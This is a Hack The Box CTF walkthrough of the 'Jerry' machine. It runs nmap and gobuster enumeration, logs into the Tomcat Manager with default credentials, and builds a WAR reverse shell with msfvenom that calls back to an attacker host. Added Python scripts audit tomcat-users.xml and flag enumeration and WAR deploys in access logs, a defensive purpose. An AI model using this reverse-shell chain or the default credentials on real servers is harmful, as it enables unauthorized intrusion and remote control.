# Hack The Box - Jerry Walkthrough without Metasploit

![Jerry](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPnhNLcu7d6QEAT163e%2F-MPp0WiGhktuiaLuQZTe%2Fimage.png?alt=media\&token=387838b7-dbcb-4486-9672-f62fe215d8e7)

## Enumeration

We will use the following nmap command to enumerate the box:

```
nmap -sC -sV 10.10.10.95
```

![Jerry Enumeration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPprM7ILqJNYLpxQKZp%2F-MPqB9PH55X9rBilq8Bi%2Fimage.png?alt=media\&token=596456bb-7379-4b41-aaba-2164d3a86bac)

We can see that it has only one port open, **8080**, and that it is running **Tomcat/Coyote JSP engine 1.1**. If we browse to **10.10.10.95:8080** we are presented with the following page:

![Apache Tomcat 7.0.88](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsKyRYz2CssXvgLMOa%2F-MPs_Hd_Tpuc9ZVjlekp%2Fimage.png?alt=media\&token=b11f7712-6c2c-400a-aa70-8a680110eef1)

Since what we have on port 8080 is a web service, our next step in enumeration is **Gobuster** (or Dirbuster or any other web enumeration tool you prefer).

{% embed url="https://github.com/OJ/gobuster" %}

### Gobuster

We will run **Gobuster** with the following flags:

- `-w`: the wordlist to use, in our case **directory-list-2.3-medium.txt** from dirbuster
- `-t`: the number of threads; since this is a CTF environment we will use 40, but in other cases it is better to run it with a lower number.

```
gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 40
```

![Gobuster First Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsKyRYz2CssXvgLMOa%2F-MPsl_F0F2i_4WKA6sDd%2Fimage.png?alt=media\&token=d28e164c-970f-4b29-b784-1ee65de4a6e8)

On this first scan we found an interesting directory, **/manager**. If we run the scan one more time with a different wordlist, this time **common.txt** from **dirb/wordlists**:

![Gobuster Second Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsKyRYz2CssXvgLMOa%2F-MPsm-yg2gN6UxcCfydB%2Fimage.png?alt=media\&token=2d4445d4-1912-4964-b735-d68b79809b80)

We can see that this time we have more results, but the important one in this case, **/manager**, appears in both scans. There are multiple lists to choose from depending on what we are looking for.

While trying to access the /manager page we are presented with this prompt to enter a user and password:

![Manager User / Password](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsKyRYz2CssXvgLMOa%2F-MPsmaF4BLoO45NgsT-B%2Fimage.png?alt=media\&token=8734dbe6-8afe-40f2-a2e4-bb4c8e45581c)

With a quick Google search we find a list of default usernames and passwords for Tomcat installations:

{% embed url="https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown" %}
Tomcat Default Credentials Combination
{% endembed %}

In our particular case the combination is:

user: **tomcat**

password: **s3cret**
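The root cause here is a privileged Manager account left on a documented default pair. The script below is an added example (not part of the walkthrough) of the check a defender would run against a server's `tomcat-users.xml`: it finds every user holding a Manager or Host-Manager role and flags well-known default credential pairs, default usernames, short passwords and the `manager-gui` plus `manager-script` combination the Tomcat Manager documentation advises against. The sample XML, the built-in list of default pairs and the 12-character length threshold are constructed for illustration; a real audit would pull the default list from a maintained source such as the one linked above.

```python
"""Audit a Tomcat tomcat-users.xml for weak or default Manager credentials.

Added example, not part of the walkthrough. The sample XML and the
default-credential list below are constructed for illustration.
"""
import xml.etree.ElementTree as ET

# Small built-in list of documented default pairs (assumption: extend it from
# a maintained list such as the netbiosX one referenced in the walkthrough).
DEFAULT_PAIRS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
    ("admin", ""), ("manager", "manager"), ("role1", "tomcat"), ("both", "tomcat"),
}
DEFAULT_USERNAMES = {name for name, _ in DEFAULT_PAIRS}
# Roles that grant access to the Manager / Host-Manager applications.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}
MIN_PASSWORD_LEN = 12  # assumption: a local policy value


def _local_name(tag):
    """Strip a namespace prefix such as {http://tomcat.apache.org/xml}."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return findings for privileged users, in document order.

    Works for both namespaced (Tomcat 7+) and namespace-less files and for
    both the 'username' and the older 'name' attribute.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local_name(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if not privileged:
            continue  # unprivileged accounts are out of scope for this check
        issues = []
        if (name, password) in DEFAULT_PAIRS:
            issues.append("default credential pair")
        if name in DEFAULT_USERNAMES:
            issues.append("default username")
        if len(password) < MIN_PASSWORD_LEN:
            issues.append("password shorter than %d characters" % MIN_PASSWORD_LEN)
        if {"manager-gui", "manager-script"} <= roles:
            issues.append("manager-gui combined with manager-script")
        if issues:
            findings.append({"user": name, "roles": sorted(privileged), "issues": issues})
    return findings


# Constructed sample: the tomcat/s3cret pair from the box plus three made-up users.
SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="Xk9vR2tQ8mLp" roles="manager-script"/>
  <user username="viewer" password="tomcat" roles="manager-status"/>
  <user username="ops" password="Gq7mZ4pW1nXc" roles="manager-gui,manager-script"/>
</tomcat-users>
"""

if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_XML):
        print(finding["user"], finding["roles"], "->", "; ".join(finding["issues"]))
```

Run against the sample it reports `tomcat` (default pair, default username, short password), `viewer` (short password) and `ops` (both Manager roles on one account); `deploy` passes. On a real host, point it at `conf/tomcat-users.xml` and treat any finding on a `manager-*` account as the same exposure this box demonstrates.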

### Tomcat Manager Interface

Once we're in the Tomcat Manager Interface we can see at the bottom of the page the Server Information:

![Server Information](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsnY_V_U7yE69wNpmH%2F-MPsqiZ7OulF6TSB_cEo%2Fimage.png?alt=media\&token=3398c2c0-abfb-4c2e-8b2c-a28de033f360)

Most of it we already know, but now we also know it's running on **Windows Server 2012 R2** and that the architecture is **amd64**.

On top we can see the current Tomcat Applications list:

![Tomcat Applications](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsnY_V_U7yE69wNpmH%2F-MPsp19UbvGCcVLB3eMn%2Fimage.png?alt=media\&token=c4ce98b1-754c-4395-8ebf-45c2a8d79d16)

And what we're interested in, the option to deploy a **WAR** file:

![War File Deploy](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsnY_V_U7yE69wNpmH%2F-MPspXeEEcretdTDMT0T%2Fimage.png?alt=media\&token=a20ca467-ce21-4c88-8ef9-2fc77524b01a)

## Exploitation

### Creating the payload

We are going to upload a reverse TCP shell created with **msfvenom**:

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Attackers-IP> LPORT=<Port> -f war > evil.war
```

![msfvenom payload](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtbMqURYDf2HAWePwB%2Fimage.png?alt=media\&token=0c43e8c5-ef0b-41b3-bdf1-1eb9bfefdb6d)

### Uploading the payload

Now we just upload the WAR using the Tomcat web application:

![Uploading evil.war](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtbdJoFgomsCIbeywk%2Fimage.png?alt=media\&token=114b9635-1751-438a-b0ac-59b9d604a321)

Once we have deployed it we will be able to see it in the list of applications:

![Evil war deployed](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtc7kQzCph4D1r4CqY%2Fimage.png?alt=media\&token=6ef1be49-26d0-4333-97ff-004bbe0f85c4)

### Executing the payload

Set up a netcat listener:

![Netcat listener](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtcMpNGaHSDDL-2NJE%2Fimage.png?alt=media\&token=ad7986e7-b8b3-44ac-98d1-65082a9b79f9)

And now we just click on the /evil application in the Tomcat applications list to get a shell back.
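Everything done against this box from the Gobuster scans onward leaves a trace in Tomcat's access log, so the same chain is a useful detection exercise. The script below is an added example (not part of the walkthrough) that parses `AccessLogValve` lines in the default `common` pattern (`%h %l %u %t "%r" %s %b`) and flags three things: directory enumeration (many 404s from one client in a short window), use of the Manager deploy endpoints (the HTML form upload seen above and the text-interface `deploy` path), and the first successful `/manager` response from a client that was previously refused with 401. The log lines are constructed to mirror this walkthrough; the window, the 404 threshold and the endpoint list are assumptions to tune per environment.

```python
"""Flag directory enumeration, Manager logins and WAR deploys in Tomcat access logs.

Added example, not part of the walkthrough. Sample log lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Default AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)
# Manager endpoints that deploy applications (HTML upload form and the
# text/script interface). Assumption: paths as shipped with Tomcat 7+.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["time"] = datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    e["path"] = e["path"].split("?", 1)[0]  # drop the query string (CSRF nonce etc.)
    return e


def detect_enumeration(entries, threshold=5, window=timedelta(seconds=60)):
    """Hosts with >= threshold 404s inside any sliding window; value is the peak count."""
    by_host = defaultdict(list)
    for e in entries:
        if e["status"] == 404:
            by_host[e["host"]].append(e["time"])
    flagged = {}
    for host, times in by_host.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[host] = max(flagged.get(host, 0), count)
    return flagged


def detect_deploys(entries):
    """Every request to a deploy endpoint, whatever its outcome."""
    return [(e["host"], e["user"], e["method"], e["path"], e["status"])
            for e in entries if e["path"].startswith(DEPLOY_PATHS)]


def detect_manager_logins(entries):
    """First 200 on /manager from a host that was earlier refused with 401."""
    denied, logins = set(), []
    for e in entries:
        if not e["path"].startswith("/manager"):
            continue
        if e["status"] == 401:
            denied.add(e["host"])
        elif e["status"] == 200 and e["host"] in denied:
            logins.append((e["host"], e["user"], e["path"]))
            denied.discard(e["host"])
    return logins


def analyze(log_text):
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    return {
        "enumeration": detect_enumeration(entries),
        "deploys": detect_deploys(entries),
        "manager_logins": detect_manager_logins(entries),
    }


# Constructed sample: a short wordlist scan, two refused Manager requests, a
# successful login as tomcat, and the HTML-form upload of a WAR.
SAMPLE_LOG = """\
192.168.1.20 - - [30/Dec/2020:14:59:10 +0000] "GET / HTTP/1.1" 200 11398
10.10.14.5 - - [30/Dec/2020:15:04:01 +0000] "GET /images HTTP/1.1" 404 1078
10.10.14.5 - - [30/Dec/2020:15:04:01 +0000] "GET /download HTTP/1.1" 404 1078
10.10.14.5 - - [30/Dec/2020:15:04:02 +0000] "GET /2006 HTTP/1.1" 404 1078
10.10.14.5 - - [30/Dec/2020:15:04:02 +0000] "GET /news HTTP/1.1" 404 1078
10.10.14.5 - - [30/Dec/2020:15:04:03 +0000] "GET /contact HTTP/1.1" 404 1078
10.10.14.5 - - [30/Dec/2020:15:04:03 +0000] "GET /about HTTP/1.1" 404 1078
10.10.14.5 - - [30/Dec/2020:15:04:04 +0000] "GET /manager HTTP/1.1" 302 -
10.10.14.5 - - [30/Dec/2020:15:06:30 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [30/Dec/2020:15:06:41 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [30/Dec/2020:15:06:55 +0000] "GET /manager/html HTTP/1.1" 200 19842
10.10.14.5 - tomcat [30/Dec/2020:15:09:12 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCDEF HTTP/1.1" 303 -
10.10.14.5 - tomcat [30/Dec/2020:15:09:12 +0000] "GET /manager/html/?org.apache.catalina.filters.CSRF_NONCE=ABCDEF HTTP/1.1" 200 20113
"""

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```

On the sample it reports the scanning host with six 404s in three seconds, one `POST /manager/html/upload` by the authenticated `tomcat` user, and the 401-then-200 login that preceded it. The `%u` field only carries a username once Basic auth succeeds, which is why the login check keys on the status transition rather than on the user column; in production the 404 threshold should be well above what a browser fetching a page with missing assets produces.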

## Pwnd

![Jerry Pwnd](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtcgaMHpgY8-zRyghK%2Fimage.png?alt=media\&token=6cd8aff5-ea75-4776-85a2-7d481156130d)
